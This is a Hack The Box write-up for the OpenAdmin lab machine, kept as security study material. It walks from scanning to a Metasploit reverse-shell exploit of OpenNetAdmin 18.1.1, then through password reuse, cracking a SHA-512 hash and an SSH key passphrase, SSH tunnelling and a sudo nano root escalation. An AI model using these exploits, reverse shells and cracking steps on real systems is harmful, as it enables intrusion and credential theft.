Redhalo

Hack The Box walkthrough – OpenAdmin machine

New Linux HTB machine today, OpenAdmin!

The difficulty is rated easy, but I have to admit I spent a bit more time on this one than on other machines.

Let’s jump in!

Enumeration

As usual, enumeration starts with nmapAutomator:

[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.79.19 Full
Running a Full scan on 10.129.79.19
Host is likely running Linux

---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-10 11:51 EST
Initiating Parallel DNS resolution of 1 host. at 11:51
Completed Parallel DNS resolution of 1 host. at 11:51, 0.03s elapsed
Initiating Connect Scan at 11:51
Scanning 10.129.79.19 [65535 ports]
Discovered open port 80/tcp on 10.129.79.19
Discovered open port 22/tcp on 10.129.79.19
Warning: 10.129.79.19 giving up on port because retransmission cap hit (1).
Connect Scan Timing: About 22.32% done; ETC: 11:53 (0:01:48 remaining)
Connect Scan Timing: About 44.97% done; ETC: 11:53 (0:01:15 remaining)
Connect Scan Timing: About 67.00% done; ETC: 11:53 (0:00:45 remaining)
Completed Connect Scan at 11:53, 136.51s elapsed (65535 total ports)
Nmap scan report for 10.129.79.19
Host is up (0.055s latency).
Not shown: 64776 closed ports, 757 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 136.59 seconds

Making a script scan on all ports
                                                                                                                                                                                                                                           
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-10 11:53 EST
Nmap scan report for 10.129.79.19
Host is up (0.043s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.42 seconds

---------------------Finished all Nmap scans---------------------
 Completed in 2 minute(s) and 25 second(s)

Two ports are open: 22 (SSH) and 80 (HTTP).

Port 80 serves nothing but the default Apache2 page:

A dirbuster scan turned up a few static website folders and one interesting directory called ona:

It is the OpenNetAdmin login page:

The login page also reveals the version in use: 18.1.1.

A quick look at searchsploit:

Looks promising 😀

There is a Metasploit module for this: as its name says, it is a command injection in OpenNetAdmin's ping handler, and the module needs no credentials (it has no username or password options). Note that the box was assigned a new address between my sessions: 10.129.79.19 during enumeration, 10.129.71.82 from here on. I configured the module as follows:

msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > show options

Module options (exploit/unix/webapp/opennetadmin_ping_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /ona/login.php   yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set rhosts 10.129.71.82
rhosts => 10.129.71.82
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set lhost tun0
lhost => 10.10.14.102
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > run

[*] Started reverse TCP handler on 10.10.14.102:4444 
[*] Exploiting...
[*] Sending stage (38 bytes) to 10.129.71.82
[*] Command shell session 1 opened (10.10.14.102:4444 -> 10.129.71.82:57144) at 2021-01-13 15:13:21 -0500
[*] Command Stager progress - 100.00% done (808/808 bytes)

whoami
www-data

Foothold

While browsing the files www-data can read, I found /opt/ona/www/local/config/database_settings.inc.php, which holds the database credentials in clear text:

www-data@openadmin:/opt/ona/www/local/config$ cat database_settings.inc.php
 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

After a few minutes spent looking at the content of the DB, it seemed like a rabbit hole: nothing interesting was there.

So I tried that password against the local user accounts on the server (su needs a terminal; if the reverse shell is not a pty, spawn one first with python3 -c 'import pty; pty.spawn("/bin/bash")'):

www-data@openadmin:/opt/ona/www$ cd /home
www-data@openadmin:/home$ ls -al
total 16
drwxr-xr-x  4 root   root   4096 Nov 22  2019 .
drwxr-xr-x 24 root   root   4096 Nov 21  2019 ..
drwxr-x---  5 jimmy  jimmy  4096 Nov 22  2019 jimmy
drwxr-x---  6 joanna joanna 4096 Nov 28  2019 joanna
www-data@openadmin:/home$ su jimmy
Password: n1nj4W4rri0R!

jimmy@openadmin:/home$ 

Bingo! The database password is reused for jimmy's system account, so we now have a shell as jimmy.

Lateral movement

Browsing again with jimmy's access, I found a directory /var/www/internal containing three PHP files:

jimmy@openadmin:/var/www/internal$ ls -al
total 20
drwxrwx--- 2 jimmy internal 4096 Nov 23  2019 .
drwxr-xr-x 4 root  root     4096 Nov 22  2019 ..
-rwxrwxr-x 1 jimmy internal 3229 Nov 22  2019 index.php
-rwxrwxr-x 1 jimmy internal  185 Nov 23  2019 logout.php
-rwxrwxr-x 1 jimmy internal  339 Nov 23  2019 main.php

index.php is a login form with username and password fields; with valid credentials, it returns joanna's id_rsa private key.

Both the username and the password check are hard-coded in index.php, but the password is stored as a SHA-512 digest. SHA-512 is a hash, not an encoding, so it cannot be decoded; it is, however, unsalted and fast, so a wordlist run or an online lookup table recovers the plaintext immediately.

The recovered password is "Revealed".
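As an added example (this is not code from the original post or from OpenNetAdmin), here is the dictionary attack that such a lookup performs against an unsalted SHA-512 digest, beside the salted, iterated, constant-time check the form should have used. The page does not reproduce the digest from index.php, so the target hash below is recomputed from the recovered password, and the wordlist is a constructed stand-in for rockyou.txt; the record format used for the hardened version is my own choice.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Stand-in for the digest hard-coded in index.php: the page does not show the
# real hex string, so it is reconstructed here from the recovered password.
TARGET_HASH = hashlib.sha512(b"Revealed").hexdigest()

# Constructed sample wordlist standing in for /usr/share/wordlists/rockyou.txt.
SAMPLE_WORDLIST = ["123456", "password", "ninja", "n1nj4W4rri0R!", "Revealed", "letmein"]


def crack_unsalted_sha512(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on an unsalted, single-round SHA-512 digest.

    With no salt and no work factor, each candidate costs one hash, and every
    user who picked the same password shares the same digest, which is why
    precomputed lookup tables ("online decoders") answer instantly.
    """
    target = target_hex.strip().lower()
    for candidate in wordlist:
        if hashlib.sha512(candidate.encode()).hexdigest() == target:
            return candidate
    return None


# What index.php should have stored instead: PBKDF2-HMAC-SHA512 with a random
# per-password salt and a large iteration count (OWASP's 2023 figure for this
# construction is 210,000), verified with a constant-time comparison.
PBKDF2_ITERATIONS = 210_000


def make_pbkdf2_record(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Return a self-describing record (hypothetical format): algo$iterations$salt$digest."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations)
    return f"pbkdf2_sha512${iterations}${salt.hex()}${digest.hex()}"


def verify_pbkdf2_record(password: str, record: str) -> bool:
    """Recompute the digest with the stored salt/iterations and compare in constant time."""
    parts = record.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha512":
        return False
    _, iterations, salt_hex, digest_hex = parts
    try:
        computed = hashlib.pbkdf2_hmac(
            "sha512", password.encode(), bytes.fromhex(salt_hex), int(iterations)
        )
        return hmac.compare_digest(computed, bytes.fromhex(digest_hex))
    except ValueError:  # malformed hex or iteration count
        return False


if __name__ == "__main__":
    print("unsalted SHA-512 cracked:", crack_unsalted_sha512(TARGET_HASH, SAMPLE_WORDLIST))
    record = make_pbkdf2_record("Revealed")
    print("stored record:", record)
    print("verify 'Revealed':", verify_pbkdf2_record("Revealed", record))
    print("verify 'revealed':", verify_pbkdf2_record("revealed", record))
```

The salt makes two records for the same password differ, so lookup tables are useless, and the iteration count turns a multi-million-guess-per-second dictionary run into a few hundred guesses per second per core; hmac.compare_digest removes the timing side channel that a plain == comparison leaks.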

The next question is how to reach this form.

The Apache configuration shows that the site is bound to localhost only, on port 52846. It also runs under joanna's account (AssignUserID, provided by the mpm-itk module), which is what lets its PHP read a file in joanna's home directory:

jimmy@openadmin:/etc/apache2/sites-enabled$ ls -al
total 8
drwxr-xr-x 2 root root 4096 Nov 22  2019 .
drwxr-xr-x 8 root root 4096 Nov 21  2019 ..
lrwxrwxrwx 1 root root   32 Nov 22  2019 internal.conf -> ../sites-available/internal.conf
lrwxrwxrwx 1 root root   33 Nov 22  2019 openadmin.conf -> ../sites-available/openadmin.conf
jimmy@openadmin:/etc/apache2/sites-enabled$ cat internal.conf
Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>
jimmy@openadmin:/etc/apache2/sites-enabled$ 

Time to pivot, then.

I configured the SSH server on my Kali machine to listen on port 4141:

[email protected]:~/Documents$ sudo systemctl status ssh
โ— ssh.service - OpenBSD Secure Shell server
     Loaded: loaded (/lib/systemd/system/ssh.service; disabled; vendor preset: disabled)
     Active: active (running) since Wed 2021-01-13 15:31:42 EST; 4s ago
       Docs: man:sshd(8)
             man:sshd_config(5)
    Process: 2234 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
   Main PID: 2235 (sshd)
      Tasks: 1 (limit: 4622)
     Memory: 2.6M
     CGroup: /system.slice/ssh.service
             └─2235 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups

Jan 13 15:31:42 kali systemd[1]: Starting OpenBSD Secure Shell server...
Jan 13 15:31:42 kali sshd[2235]: Server listening on 0.0.0.0 port 4141.
Jan 13 15:31:42 kali sshd[2235]: Server listening on :: port 4141.
Jan 13 15:31:42 kali systemd[1]: Started OpenBSD Secure Shell server.

Then from the OpenAdmin machine, I ran the following command:

jimmy@openadmin:/var/www/internal$ ssh -R 0.0.0.0:8888:127.0.0.1:52846 <kali-user>@10.10.14.102 -p 4141

This makes the OpenAdmin loopback port 52846 reachable on my Kali machine as localhost:8888. Two caveats: the 0.0.0.0 bind on the remote side only takes effect if GatewayPorts is enabled in the Kali sshd_config (by default OpenSSH binds remote forwards to loopback, which is all that is needed here), and since port 22 is open on the box and jimmy's password is known, a local forward in the other direction (ssh -L 8888:127.0.0.1:52846 jimmy@10.129.71.82, run from Kali) reaches the same site without exposing an SSH server on the attack machine.

From Kali, http://127.0.0.1:8888/ now serves the "internal" site, and the credentials recovered from index.php log in:

As expected, it returned joanna's id_rsa private key.

The key is passphrase-protected, so I converted it to a John hash with ssh2john (/usr/share/john/ssh2john.py id_rsa > id_rsa.hash) and ran John against rockyou:

[email protected]:~/Documents$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:04 DONE (2021-01-12 17:34) 0.2227g/s 3194Kp/s 3194Kc/s 3194KC/s a6_123..*7¡Vamos!
Session completed

John ran through more than three million candidates per second because the key is stored in the legacy PEM format (John reports the KDF as MD5 with a single iteration); a key written with ssh-keygen -o uses bcrypt and is far slower to crack. With the passphrase recovered, SSH in as joanna:

[email protected]:~/Documents$ ssh -i id_rsa joanna@10.129.71.82
load pubkey "id_rsa": invalid format
The authenticity of host '10.129.71.82 (10.129.71.82)' can't be established.
ECDSA key fingerprint is SHA256:loIRDdkV6Zb9r8OMF3jSDMW3MnV5lHgn4wIRq+vmBJY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.71.82' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Jan 13 20:45:47 UTC 2021

  System load:  0.0               Processes:             142
  Usage of /:   50.0% of 7.81GB   Users logged in:       0
  Memory usage: 21%               IP address for ens160: 10.129.71.82
  Swap usage:   0%
                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                           
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.


Last login: Thu Jan  2 21:12:40 2020 from 10.10.14.3
joanna@openadmin:~$ 

Bingo! We have a shell as joanna. (The "load pubkey "id_rsa": invalid format" line is harmless: ssh could not read a public key next to the private key, which does not affect authentication.)

Privilege escalation

sudo -l shows that joanna may run nano on /opt/priv as root, without a password:

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

Because sudo runs that nano as root, nano's own features hand out a root shell: Ctrl-R (read file) followed by Ctrl-X (execute command) runs an arbitrary command, the GTFOBins technique for nano. The sudo rule only matches that exact command line, so invoke it as written:

sudo /bin/nano /opt/priv
Ctrl-R Ctrl-X
reset; sh 1>&0 2>&0

Then I am root: